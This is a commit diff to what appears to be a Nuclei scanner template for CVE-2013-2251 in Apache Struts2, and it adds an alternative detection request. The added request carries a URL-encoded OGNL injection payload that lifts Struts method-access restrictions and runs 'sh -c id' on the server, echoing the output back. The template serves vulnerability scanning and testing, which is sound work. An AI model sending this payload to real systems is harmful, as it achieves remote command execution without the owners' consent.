Update CVE-2013-2251.yaml

Add new payload. Test it on this environment-https://github.com/vulhub/vulhub/tree/master/struts2/s2-016
2021-06-11 17:50:50 +08:00 · 2021-06-11 17:50:50 +08:00 · 161b2f5008
parent 9f8910ac22
commit 161b2f5008
1 changed files with 7 additions and 6 deletions
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@ -29,6 +29,13 @@ requests:
        Accept: */*
        Accept-Language: en

+      - |
+        GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept: */*
+        Accept-Language: en
+
    matchers-condition: and
    matchers:
      - type: status
@ -39,10 +46,4 @@ requests:
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
-      - type: word
-        words:
-          - "There is no Action mapped for namespace"
-          - "The origin server did not find a current representation for the target resource"
-          - "Apache Tomcat"
-        condition: or
        part: body